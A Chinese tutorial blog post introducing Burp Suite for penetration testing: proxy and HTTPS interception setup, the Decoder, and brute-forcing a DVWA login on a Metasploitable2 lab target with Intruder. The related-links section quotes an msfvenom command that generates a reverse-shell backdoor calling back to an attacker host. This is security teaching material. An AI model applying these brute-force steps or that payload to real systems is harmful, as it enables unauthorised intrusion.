首页 > 其他分享 >黑客玩具入门——9、Burp Suite

黑客玩具入门——9、Burp Suite

时间:2023-12-01 18:16:27浏览次数:60  
标签:浏览器 渗透 黑客 Burp Suite 拦截 数据包

Burp Suite是一款集成化的渗透测试工具,包含了很多功能,可以帮助我们快速完成对web应用程序的渗透测试和攻击。Burp Suite是由Java语言编写,因为Java是可以跨平台的,所以Burp Suite也是跨平台的,支持windows、linux、mac。

1、代理和浏览器设置

Burp Suite代理工具是以拦截代理的方式,拦截所有可以通过代理的网络流量。包括用户发给服务器的请求和服务器返回给用户的信息。通过拦截,Burp Suite以中间人的方式对所有往返数据进行处理。

点击web程序下的burpsuite

其余的弹窗,都使用默认设置就好了。然后在下图中,burpsuite已经为我们做了一些默认配置。

然后我们还需要在浏览器里去做一些代理配置,打开浏览器配置,选择Preferences。

最下面有个Network Settings,点击settings。

然后,把选项改成Manual proxy即可,添加ip和端口号。就完事了

另外,也可以通过浏览器的插件市场,安装proxy插件,都是可以的。不同的浏览器的操作都是类似的,这里就不多说了。

2、Proxy基本使用和数据拦截

实验靶机:owasp linux。

首先,Suite的拦截功能主要是由Intercept选项卡中的

  1. Forward:表示将拦截的数据包或修改后的数据包发送给服务器
  2. Drop:表示丢弃当前拦截的数据包
  3. Intercept is on :开启或关闭拦截功能
  4. Action:可以将数据包发送给Spider、Scanner、Repeater、Intruder等功能组件做进一步测试

等几项组成,如下图:

 

访问你的owasp服务器。

这样就代表拦截到了,其中:

  1. RAW,主要显示Web请求的raw格式,包含请求地址、http协议版本、主机头、浏览器信息、Accept可接受的内容类型、字符集、编码方式、cookie等。可以通过手动修改这些信息,对服务器端进行渗透测试。
  2. Headers,主要显示客户端的请求信息,包括Get或Post请求的参数,Cookie参数等。
  3. Hex,显示headers的二进制内容。

注意,你要一直点forward才能把数据发送给服务器。

3、拦截https加密数据

前面我们介绍了如何使用burpsuite拦截http数据,但是随着技术的进步,现在很多网站已经转到了更加安全的https。

HTTPS是一种通过计算机网络,进行安全通信的传输协议,经由HTTP进行通信,利用SSL/TLS建立安全信道,加密数据包。HTTPS使用的主要目的是提供对网站服务器的身份认证,同时保护交换数据的隐私和完整性。

Burp Suite如何拦截HTTPS加密内容呢?

  1. 在设置好浏览器代理后,使用浏览器打开http://burp,下载证书,点击CA Certificate。然后把它保存下来:

  2. 安装证书,还是在浏览器的Preferences里,选择锁头的图标,点击:

  3. 往下翻,还是在最后,点击View Certificates,选择刚才下载的证书

     

     

  4. 然后一直点OK就可以了。
  5. 然后就可以访问https的网站,试一下效果。

注意,可能会根据不同的版本有细微的差别。但是总体大都是一样的。

4、Decoder编码和解码数据

Decoder是Burp Suite自带的编码解码以及散列转换的工具,能对原始数据进行各种编码格式和散列的转换。可以通过各种编码绕过服务器的输入过滤限制。

自己玩吧

5、Intruder网站爆破

实验靶机:Metasploitable2。

访问Metasploitable2的主机ip,选择DVWA,用户名:admin,密码:password。

按照上图选择。

打开Burp Suite代理。在Http History中找到刚才提交了用户名和密码的那条http请求。

然后右键,选择send to Intruder

注意,只留下用户名和密码作为变量就可以了,就是两个$符号包起来的,右侧有添加和清除,通过选中要清除或添加的部分,添加或清除以达到目的即可。

然后选择攻击方式:

然后再payload选项卡里,添加你的字典即可。

然后点击右上角的start attack即可。

与其他数据返回的Length不同的那条数据,就是正确密码。

6、如何管理渗透测试项目,养成良好的渗透测试习惯

所有的测试渗透项目都不要放在云端,最好是在本地电脑中搞一个文件夹单独存放。所有内容要分类存放,渗透分类、资产分类。

在做渗透测试项目时,最好是一个项目就搭建一个虚拟机,不要混着用,这样管理起来更加方便,虚拟机要定期做快照。

文件夹套娃,年份/月份/目标/文件/记录的渗透过程以及密码等,都要非常清晰的进行分类存放。

一个项目一个文件夹,名字要写清楚,然后文件夹里要有个docx或markdown记录,方便以后检索。

渗透笔记记录软件

mabase是一个强大的个人知识库管理工具,它使用树形大纲的形式对文档进行管理,可以往这个大纲里填写任何的内容,并以自己喜欢的任何方式进行组织和管理这些笔记,灵活性高。可以用来收藏资料、记录学习笔记、任务管理等等。甚至可以将这些笔记生成电子书、生成HTML页面、生成PDF等。

下载地址:http://www.wjjsoft.com/chs。具体使用教程可以百度,也可以看这里:https://www.cnblogs.com/d2zs

基础的黑客入门到这里就结束了,学完了这些,你就可以自学了。

师傅领进门,修行靠个人。

最后,但行好事,莫问前程。法网恢恢,疏而不漏。莫伸手,伸手必被抓!!!!

标签:浏览器,渗透,黑客,Burp,Suite,拦截,数据包
From: https://www.cnblogs.com/zaking/p/17864984.html

相关文章

  • 黑客玩具入门——8、其他攻击手段
    1、拒绝服务攻击使用某些手段故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。实际上拒绝服务攻击并不是一个攻击方式,它是一类具有相似特征的攻击方式的集合。拒绝服务攻击有以下分类:1.数据链路层的拒绝服务攻击攻击目标:交换机集线器:以前......
  • 黑客玩具入门——6、网络嗅探
    1、网络嗅探:使用TCPDump分析网络数据TCPDump是一款资深网络工作人员必备的工具。TCPDump是一款小巧的纯命令行工具,正是因为它的体积小巧,所以这款工具可以完美的运行在大多数路由器,防火墙以及Linux系统中。而且TCPDump现在有了Windows版本。TCPDump的使用:tcpdump-v-ieht0-v......
  • 黑客玩具入门——5、继续Metasploit
    1、利用FTP漏洞并植入后门实验靶机:Metasploitable2。实践:使用nmap扫描目标靶机nmap-sVxxx.xxx.xxx.xxx(目标ip)生成linux系统后门msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=xxx.xxx.xxx.xxx(主控端ip)LPORT=5555-felf-o/home/xxxx(用户名)/backdoor.elf......
  • 黑客玩具入门——2、Kali常用命令与简单工具
    一、Linux常用命令首先,我们启动kali系统,然后点击这里的命令行工具。就可以使用下面学习的命令了,另外,如果你有过计算机基础,那么Mac的terminal和Git的gitbash,都是可以练习大部分的linux命令的。下面我们就学习一些入门的基础命令sudo,系统管理者的身份执行指令,也就是说,经由sudo......
  • Mac中使用sqlmap4burp++
    在mac中使用burp加载插件sqlmap4burp,发现报错:在系统偏好设置--安全性与隐私--隐私--完全磁盘访问权限钩上:......
  • Proxifier+Burp 抓取微信PC端小程序数据包
    由于工作要求,需要抓取微信小程序的数据包,如是了解了一下,简直是解放了一片新大陆啊!以下是记录Proxifier+Burp使用过程。现有环境BurpSuite可正常使用,能抓取浏览器HTTP/HTTPS流量。(BurpSuite的安装以及使用方法可自行百度)BurpSuite代理设置为如下图:Proxifier+Burp抓取微信H......
  • Burpsuite Intruder 暴力破jie实战
    BurpSuite是一款用于攻jiWeb应用程序的集成平台,其中包含了许多工具,其中之一就是Intruder。Intruder是BurpSuite中的一个模块,用于进行暴力破jie攻ji。下面是使用BurpSuiteIntruder进行暴力破jie的步骤:打开BurpSuite并选择要攻ji的目标网站。在BurpSuite中选择Intruder选项卡,然......
  • HackerGPT 黑客技术、工具和策略的广泛数据库AI
    黑客GPTHackerGPT是您在黑客世界中黑客的数字伙伴。这款人工智能助手在设计时考虑到了黑客黑客的独特需求,黑客知识和帮助的最前沿。HackerGPT配备了包含黑客技术、工具和策略的广泛的数据库,它不仅仅是一个信息资源,它还是您黑客之旅的积极参与者。无论您是想要学习技巧的初学者,......
  • Burpsuite Target目标功能
    这是目标功能按钮的翻译BurpSuiteTarget是BurpSuite的一个组件,主要用于帮助测试人员更好地了解目标应用的整体状况、当前的工作涉及哪些目标域、分析可能存在的攻ji面等信息。具体来说,BurpSuiteTarget包含三个组成部分:站点地图、目标域和Target工具。站点地图:站点地图是BurpS......
  • 《黑客攻防技术宝典》阅读笔记
    1.密码破解与加密探讨了不同类型的密码攻击,包括字典攻击和暴力攻击。重点介绍了密码哈希和加盐的概念,以及如何防止RainbowTable攻击。2.Web应用程序安全强调了常见的Web漏洞,如SQL注入和跨站脚本攻击(XSS)。提供了一些建议,帮助开发者编写更安全的代码,以防范常见的Web攻击......